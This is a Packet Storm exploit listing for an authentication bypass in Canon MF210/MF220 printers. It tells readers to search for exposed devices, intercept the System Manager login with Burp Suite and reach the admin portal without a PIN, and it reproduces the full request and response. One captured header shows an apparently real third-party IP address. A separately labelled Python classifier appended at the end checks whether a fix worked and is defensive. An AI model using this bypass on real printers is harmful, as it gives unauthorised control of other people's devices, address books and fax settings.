packetstorm | Huy Kha | PACKETSTORM:148067
Jun 06, 2018 - 12:00 a.m.

Canon MF210 / MF220 Authentication Bypass

2018-06-06 00:00:00
Huy Kha
packetstormsecurity.com

0.01 Low

EPSS

Percentile

83.4%

`# Exploit Title: [ Incorrect Access Control in Canon MF210 & MF220 Series ]  
# Date: [4.6.2018]  
# Exploit Author: [Huy Kha]  
# Vendor Homepage: [http://global.canon.com]  
# Software Link: [ Website ]  
# Version: MF210 & MF220 Series  
# Severity: High  
# Tested on: Mozilla FireFox  
# Description : An issue was discovered in the web interface of Canon MF210 & MF220 printers.  
A remote (unauthenticated) attacker can bypass the System Manager Mode authentication without a PIN at any URL of the device that requires authentication.  
  
  
  
# PoC :  
Start searching for Canon MF210 & MF220 printers.  
You can recognize them by the /login.html path; the version is also  
displayed on the web interface.  
https://imgur.com/a/5ON4HF6  
  
# Example :  
  
1. Go to the following URL: http://127.0.0.1/login.html  
2. Click on System Manager Mode  
3. Now intercept the request with Burp Suite, then click 'OK' to log in, and forward the requests until you reach the request for '/portal_top.html'.  
  
  
# Request :  
  
GET /portal_top.html HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://129.2.52.116/login.html  
Cookie: fusion-http-session-id=TYFMNOVENYXIJSRENKDC  
Connection: close  
Upgrade-Insecure-Requests: 1  
  
# Response :  
  
HTTP/1.1 200 OK  
Expires: Thu, 1 Jan 1998 00:00:00 GMT  
Content-Type: text/html  
Content-Length: 6119  
Pragma: no-cache  
Cache-Control: no-store, no-cache, max-age=0  
Connection: close  
Set-Cookie: fusion-http-session-id=TYFMNOVENYXIJSRENKDC;Comment=;Version=;HttpOnly  
  
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">  
<html xmlns="http://www.w3.org/1999/xhtml" >  
<head>  
<meta http-equiv="content-type" content="text/html; charset=utf-8" />  
<meta http-equiv="content-script-type" content="text/javascript" />  
<meta http-equiv="content-style-type" content="text/css" />  
<meta http-equiv="pragma" content="no-cache" />  
<meta http-equiv="cache-control" content="no-cache,no-store,max-age=0" />  
<meta http-equiv="expires" content="Thu, 01 Jan 1970 00:00:00 GMT" />  
<meta http-equiv="X-UA-Compatible" content="IE=7" />  
<link rel="shortcut icon" type="image/x-icon" href="media/favicon.ico" />  
<link rel="stylesheet" type="text/css" media="all" href="css/ja.css" />  
<link rel="stylesheet" type="text/css" media="all" href="css/common.css" />  
<link rel="stylesheet" type="text/css" media="all" href="css/portal.css" />  
<link rel="stylesheet" type="text/css" media="all" href="css/icons.css" />  
<script type="text/javascript" src="js/rui.js"></script>  
<script language="javascript">  
function unloadFunc(e) { }  
registEvent(window, "unload", unloadFunc);  
</script>  
<title>Remote UI: Portal: MF220&nbsp;Series: MF220 Series</title>  
</head>  
<body>  
<div id="container">  
<div id="ruiPotalSet">  
<div class="Wrapper">  
<div id="portalBranding">  
<h1 id="deviceLogo">  
<a href="portal_top.html">  
  
<img src="media/branding_logo_imageCLASS.png" />  
  
</a>  
</h1>  
<div id="productInformation">  
<table>  
<caption></caption>  
<colgroup>  
<col class="ItemNameColumn" />  
<col class="ItemValueColumn" />  
</colgroup>  
<tbody>  
<tr>  
<th>Device Name:</th>  
<td>MF220&nbsp;Series </td>  
</tr>  
<tr>  
<th>Product Name:</th>  
<td>MF220 Series </td>  
</tr>  
<tr>  
<th>Location:</th>  
<td> </td>  
</tr>  
</tbody>  
</table>  
</div>  
</div>  
<div id="commonTools">  
<fieldset id="authTools">  
  
<p><a href="/logout.cgi"><span class="Name">Log Out</span></a></p>  
</fieldset>  
</div>  
</div>  
<hr />  
</div>  
<div id="applications">  
<div id="portalApplicationBranding">  
<div class="Wrapper">  
<h1 id="applicationLogo"><img src="media/app_icon.png" /><span  
class="BrandingName">Remote UI: Portal</span></h1>  
<div id="appTools">  
<a href="mailto:"><span class="Name">Mail to System Manager</span></a>  
</div>  
</div>  
</div>  
<hr />  
<div id="applicationContents">  
<div class="Wrapper">  
<div id="contentsWrapper">  
<div id="contents">  
<div id="contentHeading_potal">  
<h2 class="PageName">Device Info</h2>  
<div id="contentHeadingTools">  
<div id="tmpUpdate">Last Updated:06/04/2018 04:27 AM</div>  
<div id="tmpReload">  
<a href="javascript:location.reload()"><img src="media/bh_updt.gif"  
alt="Update" title="Update" /></a>  
</div>  
</div>  
</div>  
<hr />  
<h2>Contents</h2>  
<div id="quotationModule">  
<div class="QuotationModuleHeading"><h3></h3></div>  
<div class="QuotationModuleElement">  
<div id="deviceBasicInformation" class="ContentModule">  
<div class="ModuleHeading"><h4>Device Basic Information</h4></div>  
<div id="deviceStatusModule" class="ModuleElement">  
<h5>Device Status</h5>  
<table class="PropertyListComponent">  
<colgroup>  
<col class="ItemNameColumn" />  
<col class="ItemValueColum" />  
</colgroup>  
<tbody>  
<tr>  
<th>Printer:</th>  
<td><span class="StatusIcon"><img src="media/sg_off.gif"/></span>  
<span class="StatusMessage">Sleep mode.</span>  
</td>  
</tr>  
<tr>  
<th>Scanner:</th>  
<td><span class="StatusIcon"><img src="media/sg_off.gif"/></span>  
<span class="StatusMessage">Sleep mode.</span>  
</td>  
</tr>  
  
<tr>  
<th>Fax:</th>  
<td><span class="StatusIcon"><img src="media/sg_ok.gif"/></span>  
<span class="StatusMessage">Ready to send or receive faxes.</span>  
</td>  
</tr>  
  
</tbody>  
</table>  
</div>  
<div id="deviceErrorInfoModule" class="ModuleElement">  
<h5>Error Information</h5>  
<p>No errors.</p>  
  
</div>  
</div>  
<div id="MaintenanceInfomationModule" class="ContentModule">  
<div class="ModuleHeading"><h4>Consumables Information</h4></div>  
<div id="paperInfomationModule" class="ModuleElement">  
<input type="button" class="ButtonEnable" value="Check Consumables Details"  
onclick="location.href='consumables_check.html'"/>  
<h5>Paper Information</h5>  
<table summary="Paper Source, Remaining Paper, Paper Size">  
<colgroup>  
<col class="PaperSourceColumn" />  
<col class="RemainColumn" />  
<col class="PaperSizeColumn" />  
<col class="PaperTypeColumn" />  
</colgroup>  
<thead>  
<tr>  
<th>Paper Source</th>  
<th>Paper Level</th>  
<th>Paper Size</th>  
<th>Paper Type</th>  
</tr>  
</thead>  
<tbody>  
<tr>  
<th>Multi-Purpose Tray</th>  
<td>None</td>  
  
<td>LTR</td>  
  
<td>Plain (16 lb Bond-23 lb Bond)</td>  
</tr>  
<tr>  
<th>Drawer 1</th>  
<td>OK</td>  
  
<td>LTR</td>  
  
<td>Plain (16 lb Bond-23 lb Bond)</td>  
</tr>  
</tbody>  
</table>  
</div>  
<div id="tonerInfomationModule" class="ModuleElement">  
<h5>Cartridge Information</h5>  
<table>  
<colgroup>  
<col class="ItemNameColumn" />  
<col class="ItemValueColumn" />  
</colgroup>  
<thead>  
<tr>  
<th>Color</th>  
<th>Level</th>  
</tr>  
</thead>  
<tbody>  
<tr>  
<th>Black</th>  
<td><img src="media/ink_bk06.gif" alt="" title="" />60%</td>  
</tr>  
</tbody>  
</table>  
</div>  
</div>  
<div id="linkInformationModule" class="ContentModule">  
<div class="ModuleHeading"><h4>Support Link</h4></div>  
<div class="ModuleElement">  
<table class="PropertyListComponent">  
<colgroup>  
<col class="ItemNameColumn" />  
<col class="ItemValueColumn" />  
</colgroup>  
<tbody>  
<tr>  
<th>Support Link:</th>  
  
<td></td>  
  
</tr>  
</tbody>  
</table>  
</div>  
</div>  
</div>  
</div>  
</div>  
</div>  
<hr />  
<div id="navigationWrapper">  
<div id="navigation">  
<h2>menu</h2>  
<div id="navStandard">  
<h3 class="GroupTitle">Standard Tool</h3>  
<ul>  
<li class="Main">  
<a href="j_plist.html" class="Standby SystemMain"><span class="Name">Status  
Monitor/Cancel</span></a>  
</li>  
<li class="Main">  
<a href="p_paper.html" class="Standby UsermodeMain"><span  
class="Name">Settings/Registration</span></a>  
</li>  
</ul>  
</div>  
  
<div id="navGeneral">  
<ul>  
<li class="Main">  
<a href="a_addresslistone.html" class="Standby AddressMain">  
<span class="Name">Address Book</span></a>  
</li>  
</ul>  
</div>  
  
</div>  
</div>  
</div>  
</div>  
</div>  
<hr />  
<div id="applicationInfo">  
<address class="SiteInforLegal">Copyright CANON INC. 2014</address>  
</div>  
</div>  
</div>  
</body>  
</html>  
  
  
  
# Do we now have access to the printer in System Manager Mode? : Yes  
  
# Screenshot : https://imgur.com/a/U6oBYNV  
  
# How to fix this? : Remove the default password and add a new (strong) password.  
  
  
`
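
Added example, not part of the original advisory or of Canon's code: a Python classifier for a captured Remote UI response, for confirming on your own device after a System Manager PIN has been set that a request made without the PIN no longer returns the logged-in portal. It assumes, based on the response shown above, that a logged-in session is marked by a "Remote UI: Portal" title together with the /logout.cgi link; `PortalScan`, `classify_response` and both sample strings are names and data constructed for this example.

```python
from html.parser import HTMLParser

class PortalScan(HTMLParser):
    """Collect the <title> text and every <a href> value."""
    def __init__(self):
        super().__init__()
        self.title, self.hrefs, self.in_title = "", [], False
    def handle_starttag(self, tag, attrs):
        self.in_title = tag == "title"
        if tag == "a":
            self.hrefs.append(dict(attrs).get("href") or "")
    def handle_endtag(self, tag):
        self.in_title = False
    def handle_data(self, data):
        if self.in_title:
            self.title += data

def classify_response(raw):
    """Parse a captured HTTP response; report whether it is a logged-in portal page."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    status_line, *header_lines = head.split("\n")
    fields = status_line.split(" ", 2)
    status = int(fields[1]) if len(fields) > 1 and fields[1].isdigit() else 0
    headers = {k.strip().lower(): v.strip()
               for k, sep, v in (h.partition(":") for h in header_lines) if sep}
    scan = PortalScan()
    scan.feed(body)
    is_portal = "Remote UI: Portal" in scan.title
    # Assumption: the /logout.cgi link is only rendered for a logged-in session.
    has_logout = any(h.split("?")[0].endswith("logout.cgi") for h in scan.hrefs)
    return {"status": status, "is_portal": is_portal,
            "session_cookie": "fusion-http-session-id=" in headers.get("set-cookie", ""),
            "logged_in": status == 200 and is_portal and has_logout}

# Constructed sample, abbreviated from the response shown in the advisory.
SAMPLE_PORTAL = (
    "HTTP/1.1 200 OK\nContent-Type: text/html\n"
    "Set-Cookie: fusion-http-session-id=TYFMNOVENYXIJSRENKDC;Comment=;Version=;HttpOnly\n\n"
    "<html><head><title>Remote UI: Portal: MF220&nbsp;Series: MF220 Series</title></head>"
    '<body><fieldset id="authTools"><p><a href="/logout.cgi">Log Out</a></p></fieldset></body></html>'
)
# Constructed stand-in for a response without a logged-in session (not from the advisory).
SAMPLE_LOGIN = (
    "HTTP/1.1 200 OK\nContent-Type: text/html\n\n"
    "<html><head><title>Remote UI: Login</title></head>"
    '<body><form action="#"></form></body></html>'
)
```

After remediation, the response to a PIN-less request should classify with `logged_in` false, as the second sample does.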
